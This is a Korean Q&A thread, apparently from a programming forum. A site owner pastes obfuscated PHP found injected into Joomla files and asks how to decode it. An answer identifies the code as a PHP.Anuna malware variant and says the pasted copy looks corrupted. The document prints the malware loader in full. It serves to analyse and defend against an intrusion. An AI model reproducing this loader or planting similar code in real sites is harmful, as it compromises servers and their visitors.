
최근 LAMP 서버의 일부 Joomla 파일 맨 위에 난독화된 코드가 있는 것을 발견했습니다. 분명히 Joomla 익스플로잇을 통해 심어진 것이지만, 코드가 워낙 모호해서 무엇을 하는지 거의 알 수 없습니다. 분석하는 동안 특정 문자열이 반복적으로 사용되는 것을 발견했는데, 이 PHP 코드는 분명히 "opjudovg"라는 문자열로 난독화되어 있습니다.

"opjudovg"로 인터넷 검색을 조금 해 보니 같은 문자열이 쓰인 다른 사례들(모두 Joomla)을 찾았지만,

이 스크립트가 실제로 무엇을 하는지에 대한 좋은 답은 찾지 못했습니다.

이것을 어떻게 리버스 엔지니어링하면 좋을지 아이디어가 있는 분 계신가요?

<?php $ldzlfqw = ',3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!  x27!hmg%)!gj!~<ofmy%]y72]254]y76#<!%w:!>!(%w:!>!  x2467+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!1 156  x75  156  x61"])))) { $GLOBALS[" x  x242178}527}88:}334}472 x24<!%ff8M4P8]37]278]225]241]3 x64"))) { $qnqbjbm = " x63  162  x654- x24y4 x24- x24]y8 x24- x24]26 x24- x24<%j,eTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!VER[" x48  124  x54  120  x5f  125  x53  105  x52  137  x41  107  x41<!fmtf!%b:>%s:  x5c%j:.pV  x7f  x7f  x7f  x7f<u%V xpo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj x2]234]342]58]24]31#-%tdz*Wsfuvso!%bss x5csbowTW%hIr x5c1^-%r  x5c2^-%hOh/#00#W~!%t27f;!osvufs}w;*  x7f!>> x22!pd%)!gj}Z;h!opjudovg}{fid>}&;!osvufs}  x7f;!opjudovg}k~~<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]83<!fmtf!%z>2<!%ww2)%w`TW~ x24<!fwbm)%tjw)bssb%-#1GO  x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/6<tfs%w6<  x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR  x27tfs%6<*17-SFtmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubu%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%q% x27Y%6<.msv`ftsbqA7>q%6<  x7fw6* x7f_*#fubfsdXk5`{66~6<&w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss  141  x74  145  x5f  146  x75  156  142  x5f  163  x74  141  x268]y7f#<!%tww!>!  x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:2L5P6]y6gP7L6M7]D4]275]D:Mn%<#372]58y]472]37y]672]48y]#>s%<#462]47252]y85]256]y6g]257]y86]267]y74]275]y7:]`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg}  xy]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:3qj%7> x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA   x27jsv%6<C>^#zsfvr#  x5cq%7**^#zsfvr#  x5cq%)ufttj  x22)gj6<^#Y# x5cg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>  x22!ftmbg)!gj<*#k#)usbut`crray_map("burmcad",str_split("%tjw!>!#]y84]275]y83]248]y83]256]y81]2652]},;osvufs} x27;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}34]368]322]3]364]6]283]427]3<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgPbssbz)#44ec:649#-!#:618d5f9#-!#f6c683-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3! 
x27!hmg%!)!gj!<,*!|  x24- x24gvodujpo! x24- x24y7 x24- x24*<! x24- x2#!>!2p%Z<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bdsvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A  x27&6< x7fw}.;/#/#/},;#-#}+;%-qp%)EBFI,6<*127-UVPFNJU,6<*27-SFGTOBc x27,*b x27)fepdof.)fepdof.  x63  164  x69  157  x6e"; function burmcad(]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy  x61  156  x64  162  x6f  151/#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!#/#o]#/*)323zbe!-#jt0*?]+^?]_  x5c}X x24<!%tmw!>!#]y8493e:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]2)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3oSUOSVUFS,6<*msv%7-MSV,6<*)ujo$n){return chr(ord($n)-1);} @error_reportw6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA  x27&6<.fm54l} x27;%!<*#}_;#)323ld)fepmqyf  x27*&7-n%)utjm6<  x7fw6*CW&)7gj6<*K)ftp71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#zB%z>! x24/%tmw/  x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#Q%:-5ppde:4:|:**#ppde#)tutjyf`4 x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudove))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:cvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*42!>!bssbz)  x24]25 x24- x24-!% x24- x24*!|! x24- x24  x5c%j^ 27{ftmfV  x7f<*X&Z&S{ftmfV  x7f<*XAZASV<*w%)ppde>2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x27jR x27id%6<  x7fw6* x*ofmy%)utjm!|!*5!  
x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutUT`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44##0#/*#npd/#)rrd/#00;quui#>.%!<***f  x27,*e x27,*d x27,*8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~z)#P#-#Q#-#B#-#T#-#E~<ftmbg!osvufs!|ftmf!~<**9.-j%5  116  x54"]); if ((strstr($uas,"  x6d  163  x69  145!%w:**<")));$ikuqvqa = $qnqbjbm("", $xchsxyf); $ikuqvqa();}PI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|mdXA6~6<u%7>/7&6|7**1111272 164") && (!isset($GLOBALS["  x6-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>{**#k#)tutjyf`x  x22l:!}V;3q%}U;y]}R;<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx~<#/%  x24- x24!>!fyqmpef)# x24*<!%t::!>! x24Ypp3)%cB%iN}#-!  x24/%tmw/opd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`m6* x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofu*<%j:,,Bjg!)%j:>>1*!%b:>5]D6#<%fdy>#]D4]273]D6P.7eu{66~67<&w6<*&7-#o]s]o]s]#61  156  x75  156  x61"]=1; $uas=strtolower($_SER}")) or (strstr($uas," x72  166  x3a  61  x31")) or (strstr($uas,"445]43]321]464]284]364]6yy)#}#-#  x24- x24-tusqpt)%z-#:#*  x24- x24!>! x24/%tjw/  x24)% x2jgA x27doj%6<  x7fw6* x7f_*#fmjgk4`{6~9{d%:osvufs:~928>>  x22:f4gps)%j>1<%j=tj{fpg)%  x24- x24*<!~!  
x24/%t2w/  x24)##-!#x27pd%6<pd%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd%w2^,%b:<!%c:>%s:  x5c%j:^<!%w` pd#)tutjyf`opjudovg  x22)!gj}1~!<2p% x7f!~!<#!*uyfu x27k:!ftmf!}Z;^nbsbq% x5cSFWSFT`%}X;!sp!*#opo#>>}R;msvD8]86]y31]278]y3f]51L3]84]y-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hn<**#57]38y]47]67y]37]88y]27]28y]#/r|:*r%:-t%)3of:opjudovg<~  x24<!%o:!>!]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]31M6]y3e]81#/#7e:55946-tr.984:75983:48984:f)fepdof`57ftbc x7f!|ing(0); $xchsxyf = implode(ax5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>x24-  x24tvctus)%  x24- x24b!>!%if((function_exists(" x6f6]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212](<!fwbm)%tjw)#  x24#-!#]y38#-k;opjudovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%)zbssb!>!ssbnpe_GMFT`QIQ&f_UTpmdXA6|7**197-2qj%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFS7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6<  x7fw6<*K)ft7-K)ebfsX x27u%)7fmjix6<C x27&6<*rfs%7-K)fujsxX6<#o]o]Y%67~6<Cw6<pd%w6Z6<.5`hA x273qj%6<*Y%)fnbozcYufhA  x272qj%6<^#zsfvr#  x5cq%7/7#@#7/7^#iubq# x5cq%99#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%  x24)%c*W%eN+#Qi x5c1^W%c!>!%i x5c2^<!Ce*[!%cIjQ-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#6Z6<.2`hA x27pd%6<C  x27pd%6|6|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs!*)323zbek!~!<b% x7f!<X>b%Z<#omgoj{h1:|:*mmvo:>:iuhofmSTrrEvxNoITCnuF_EtaeRCxECaLPer_RtSkqicujnj'; $igdlorg=explode(chr((507-387)),substr($ldzlfqw,(23721-17795),(191-157))); $jhvudq = $igdlorg[0]($igdlorg[(3-2)]); $xuqzdby = $igdlorg[0]($igdlorg[(10-8)]); if (!function_exists('inlski')) { function inlski($zkhzovdq, $rcqclg,$extvvvla) { $levdzxqh = NULL; for($nomjzfqly=0;$nomjzfqly<(sizeof($zkhzovdq)/2);$nomjzfqly++) { $levdzxqh .= substr($rcqclg, $zkhzovdq[($nomjzfqly*2)],$zkhzovdq[($nomjzfqly*2)+(6-5)]); } return $extvvvla(chr((42-33)),chr((312-220)),$levdzxqh); }; } $zhjksylgzw = 
explode(chr((271-227)),'5142,25,1198,22,3717,33,203,38,4254,45,409,56,3526,48,4300,61,2331,24,296,35,1170,28,2225,40,2576,41,5015,28,1639,70,107,34,5528,23,4564,56,5790,29,4225,29,2687,47,3692,25,5472,56,5410,62,5355,55,3251,39,1468,46,5551,70,1514,66,1069,58,2617,46,4448,37,879,67,2165,32,2547,29,3168,20,2087,55,4130,48,4095,35,2038,49,1383,40,633,48,3441,35,3496,30,1872,63,3130,38,43,64,0,43,3188,63,2983,41,4781,58,4649,44,1988,50,825,54,3339,54,2197,28,2355,41,5819,53,141,62,3800,57,3290,49,5326,29,3633,59,5872,30,512,40,2504,43,4994,21,4693,61,2142,23,2663,24,681,33,4485,24,946,66,5902,24,2827,70,1580,59,488,24,3083,47,1012,57,3963,63,3927,36,1709,56,5260,66,2396,53,4910,42,1343,40,1220,57,4839,35,3857,70,1303,40,1423,45,4874,36,241,33,3024,59,5112,30,4385,63,331,45,1935,53,4509,55,4026,69,5673,48,376,33,1835,37,5621,52,2770,57,595,38,1127,43,3750,50,2449,55,4754,27,4952,42,2734,36,1793,42,4202,23,1277,26,3393,48,2265,66,714,66,274,22,1765,28,5167,65,4361,24,552,43,2897,43,2940,43,4178,24,465,23,4620,29,5043,69,780,45,3476,20,5753,37,5721,32,5232,28,3574,59,4299,1'); $iuypjrt = $jhvudq("",inlski($zhjksylgzw,$ldzlfqw,$xuqzdby)); $jhvudq=$ldzlfqw; $iuypjrt(""); $iuypjrt=(686-565); $ldzlfqw=$iuypjrt-1; ?> 

언뜻 보기에, 보통 이런 식의 코드는 서버에서 데이터를 빼내기 위해 일종의 eval을 사용합니다. – Xorifelse


@Xorifelse 네, 저도 그렇게 생각했지만 더 자세한 내용을 알아내기 위해 어떻게 "되돌려야"(디코드해야) 할지 잘 모르겠습니다. 어떤 도움이라도 대단히 감사하겠습니다. –


참조: http://security.stackexchange.com/q/115461 – Rizier123

답변


이것은 PHP.Anuna(일명 PHP!Anuna)의 또 다른 변형입니다. 올려주신 버전은 작동하지 않는 것 같습니다(아마 복사/붙여넣기가 잘못된 듯합니다). 이것의 난독화를 푸는 데 시간을 낭비하지 마십시오. 여기에 이미 난독화가 풀린 것이 하나 있습니다: http://pastebin.com/NstDXerz (안티바이러스 필요). 단계별로 난독화를 푸는 과정은 여기서 볼 수 있습니다: https://stackoverflow.com/a/38143382/1908705